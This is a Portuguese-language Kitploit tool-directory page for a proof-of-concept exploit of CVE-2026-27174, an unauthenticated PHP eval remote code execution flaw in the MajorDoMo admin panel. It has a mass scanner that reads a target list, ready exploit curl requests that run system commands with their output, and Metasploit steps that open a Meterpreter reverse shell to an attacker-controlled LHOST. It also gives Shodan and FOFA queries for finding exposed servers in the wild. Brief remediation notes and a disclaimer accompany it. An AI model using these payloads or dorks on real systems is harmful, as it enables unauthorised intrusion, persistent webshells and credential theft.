Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - Uma execução remota de código não autenticada através do recurso de console PHP do painel de administração | Kitploit
Ferramentas/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - Uma execução remota de código não autenticada através do recurso de console PHP do painel de administração

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 5 mesesAinda não revisado

majordomo-CVE-2026-27174-poc

Uma prova de conceito explorando uma execução remota de código não autenticada através do recurso de console PHP do painel de administração no MajorDomo (Módulo Doméstico Principal).

Vulnerabilidade

O painel de administração do MajorDoMo expõe um console de avaliação PHP via /admin.php. Devido a uma falta de saída após um redirecionamento de autenticação em panel.class.php, o manipulador AJAX inc_panel_ajax.php é incluído incondicionalmente — tornando seu eval() acessível por qualquer requisição HTTP não autenticada.

Um atacante pode executar código PHP arbitrário com uma única requisição GET, sem exigir credenciais, acesso prévio ou interação da vítima.

Versões Afetadas

  • Todas as versões do MajorDomo anteriores ao patch de 18 de fevereiro de 2026.

Scanner de Detecção

scan.py é um scanner multithread não destrutivo que detecta hosts vulneráveis ao CVE-2026-27174 sem executar nenhum payload prejudicial.

Como funciona

O scanner opera em três fases sequenciais por alvo:

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

Um marcador alfanumérico aleatório é gerado por requisição para evitar falsos positivos de cache, WAFs ou poluição de resposta.

Uso

Requisitos

root@kitploit:~
pip install requests

1. Prepare um arquivo de alvos

Crie um arquivo targets.txt com um IP:PORTA por linha:

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Execute o scanner

root@kitploit:~
python3 scan.py targets.txt

Saída

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Gerado automaticamente quando pelo menos um host vulnerável é encontrado:

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]

Exploração

Com base no resultado do campo system_functions_available no arquivo result.json, podemos criar uma requisição GET usando a(s) função(ões) do sistema para explorar o RCE:

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automação

Módulo Metasploit:

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

No mundo real

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

Impacto

Um atacante remoto não autenticado pode:

  • Executar código PHP arbitrário no servidor
  • Ler arquivos sensíveis (/etc/passwd, arquivos de configuração, credenciais)
  • Escrever webshells PHP para acesso persistente
  • Migrar para execução de comandos ao nível do SO se as funções PHP system, exec, shell_exec ou passthru não estiverem desabilitadas

O impacto efetivo depende da configuração PHP disable_functions do servidor:

CVSS 4.0 - 9.3 CRÍTICO — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRÍTICO — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remediação e Mitigação

Atualize para a versão mais recente do MajorDomo (Módulo Doméstico Principal).

ControlePrevine RCEPrevine Execução SO

Referências

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

Aviso Legal

Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal.

Baixar ferramenta
FieldDescription
targetIP:PORTA escaneado
urlURL completa onde RCE foi confirmada
rce_phpExecução de código PHP confirmada (sempre true nos resultados)
disable_functionsConfiguração PHP disable_functions do servidor (null se vazio)
system_functions_availableFunções de execução do SO chamáveis por um atacante
impact_levelHIGH (execução do SO acessível) ou MEDIUM (apenas RCE PHP)
ScenarioImpact LevelDescription
Sem disable_functionsCRÍTICOExecução total de comandos do SO
Restrições parciaisALTORCE PHP + execução parcial do SO
disable_functions bloqueia toda execuçãoMÉDIOApenas RCE PHP (leitura/escrita de arquivos, exfiltração de dados)
Aplicar patch de 18 de fevereiro de 2026✅✅
Firewall/lista de permissões de IP em /admin.php✅✅
Hardening de disable_functions❌✅